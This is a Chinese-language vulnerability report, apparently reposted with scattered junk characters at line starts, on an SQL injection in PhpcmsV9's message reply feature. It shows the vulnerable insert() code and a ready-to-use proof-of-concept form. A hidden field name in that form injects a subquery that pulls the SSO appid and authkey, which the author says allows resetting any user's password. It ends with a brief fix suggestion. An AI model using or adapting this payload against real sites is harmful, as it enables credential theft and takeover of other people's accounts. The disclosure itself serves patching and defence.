PhpcmsV9 SQL注射修改任意用户密码漏洞

admin

简要描述：

! |+ `; W+ S, k3 b  i第二发如约来到，感谢大家的关注，在第二发中使用了一个无限制的SQL注射，最终目的可以修改任意用户密码，建议确认安全危害等级为高。

明天再更新下一个漏洞。
+ z# t: b) P1 ^详细说明：
在/phpcms9/phpcms/modules/message/index.php中有代码如下：

$messageid = $this->message_db->insert($_POST['info'],true);

4 d1 m# h3 Z9 n+ B3 }, }
$ G: P; e% M+ E$ vinsert方法是key value的，代码如下：

/ X# d9 N4 a* J6 A, _# Apublic function insert($data, $table, $return_insert_id = false, $replace = false) {
$ ]: g: K: c3 K0 q) g                if(!is_array( $data ) || $table == '' || count($data) == 0) {
/ B- I! {9 F$ t8 V* v- w                        return false;
                }
               
  I. i9 E7 `* b% D/ m                $fielddata = array_keys($data);
                $valuedata = array_values($data);
                array_walk($fielddata, array($this, 'add_special_char'));
, ?/ I, D+ g8 S6 j: k6 w# K                array_walk($valuedata, array($this, 'escape_string'));
6 `% c( t: {- T5 a9 _# V               
% C8 L0 r% e" b% m$ B                $field = implode (',', $fielddata);
                $value = implode (',', $valuedata);
8 l+ E6 L# c9 x3 t, T
                $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
                $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'`('.$field.') VALUES ('.$value.')';
+ s" s0 t8 Y+ {- e( k                $return = $this->execute($sql);
, C: A$ j' I: f; N" I                return $return_insert_id ? $this->insert_id() : $return;
        }

1 d4 g3 G% s; q3 E) L, ~7 U
嗯，很遗憾的是
) {; C& w3 e  Q" H
array_walk($fielddata, array($this, 'add_special_char'));
( E1 }! C* H3 W$ k' i% u) j, M
$ c) m# N6 c6 I9 T, x1 H! d
: J3 {4 T6 G! ^+ E8 M2 p/ f中并没有对key做任何的过滤，所以，第一段提到的代码导致了一个SQL注射漏洞 ：（。

3 W4 ~: D* T7 Z* s到此，为了poc一下，我读取了我本地的authkey，接下来我已经可以重置任意用户密码了，后面的事情我就没有演示了。
: j) }6 W1 R: [7 G" ~2 m7 M. |2 I5 g
% i+ t! j" |7 A; ?/ E" F漏洞证明：
5 _  A1 s( O+ ^6 N0 s# p读出了phpsso_server的appid和authkey，然后可以调用client.class.php中的ps_member_edit函数修改任意用户密码。
& D* F2 L" n2 y

表单如下：用户名什么的得自己改一改。
<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">
+ }. T2 J/ _- a6 U$ w<table width="100%" cellspacing="0" class="table_form">
3 A+ l# }, R9 v% h<tr>
<th>标 题：</th>
1 n6 M' P! d, `$ c9 o# D) `<td><input name="info[subject]" type="text" id="subject" size="30" value="Re: hh"  class="input-text"/></td>
/ w7 T, w0 U  m! Q3 I1 Q$ s3 m</tr>
<tr>
<th>内 容：</th>
<td><textarea name="info[content]"  id="con" rows="5" cols="50"></textarea></td>
</tr>
<input type="hidden" name="info[replyid]" value="2" />
) b( r* e1 |" {( V<input type="hidden" name="info[send_to_id]" value="cc" />
: j  |" p) Q& l- E- R1 m<input type="hidden" name="info[send_from_id]" value="hh">
<!-- 漏洞的利用重点在这里开始 -->
/ s: \, v* l3 n$ k<input type="hidden" name="info[`status`) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104, 104),1)#]" value="cc" />
/ S$ n5 t' ?+ ^/ y<!-- 漏洞的利用重点在这里结束 -->
<tr>
; q7 T" N+ F" ^* a" J0 x& x<th>验证码：</th>
<td><input name="code" type="text" id="code" size="10"  class="input-text"/> <img id='code_img' onclick='this.src=this.src+"&"+Math.random()' src='http://localhost/phpcms9/api.php?op=checkcode&code_len=4&font_size=14&width=110&height=30&font_color=&background='></td>
% S3 R+ c) @# a</tr>
9 G1 f( C0 |- f# F" |3 _<tr>
<td></td>
<td colspan="2"><label>
<input type="submit" name="dosubmit" id="dosubmit" value="确 定" class="button"/>
. F- r& r) a  ^* j</label></td>
</tr>
</table>
</form>
& O$ S! C5 B# N. z7 }& b在add_special_char函数内对key做过滤就可以了。


0 P: r3 R. S- [( y5 h